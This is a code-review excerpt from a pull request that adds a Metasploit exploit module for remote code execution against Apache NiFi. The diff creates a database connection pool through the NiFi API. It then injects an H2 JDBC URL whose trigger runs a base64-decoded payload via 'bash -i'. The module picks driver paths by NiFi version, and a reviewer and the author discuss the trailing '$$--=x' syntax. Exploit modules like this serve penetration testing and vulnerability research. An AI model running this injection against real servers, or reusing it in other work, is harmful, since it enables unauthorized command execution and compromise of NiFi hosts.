modules/exploits/linux/http/apache_nifi_h2_rce.rb

```diff
@@ -0,0 +1,293 @@
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 15])
+      ],
+      self.class
+    )
+  end
+
+  def create_dbconnectionpool
+    @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
+    body = {
+      'revision' =>
+          {
+            'clientId' => 'x',
+            'version' => 0
+          },
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
+        'bundle' => {
+          'group' => 'org.apache.nifi',
+          'artifact' => 'nifi-dbcp-service-nar',
+          'version' => @version.to_s
+        },
+        'name' => @db_con_pool_name
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', @process_group, 'controller-services'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("POSTing processor #{@processor} configuration", response, 201, 'id')
+  end
+
+  def configure_dbconpool
+    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
+    b64_pe = ::Base64.strict_encode64(payload.encoded)
+    equals_count = b64_pe.count('=')
+    if equals_count > 0
+      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
+
+    if @version >= Rex::Version.new('1.23.0')
+      # 1.23.0, not exploitable though
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.2.220.jar'
+    elsif @version > Rex::Version.new('1.16.0')
+      # 1.17.0-1.22.0, only up to 21 is exploitable
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar'
+    else
+      # 1.16.0
+      driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.210.jar'
+    end
+
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'id' => @db_con_pool,
+        'name' => @db_con_pool_name,
+        'bulletinLevel' => 'WARN',
+        'comments' => '',
+        'properties' => {
+          # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
+          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be more clean
+          # by using mem here instead of file
+          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
```

Comment:
Can you please add a small comment about what the trailing `$$--=x` is about?

Reply:
`$$` represents the end of the code block (matches to the beginning `$$`, the rest was a carryover from the metabase exploit, and can be removed (and will be when I push in a minute)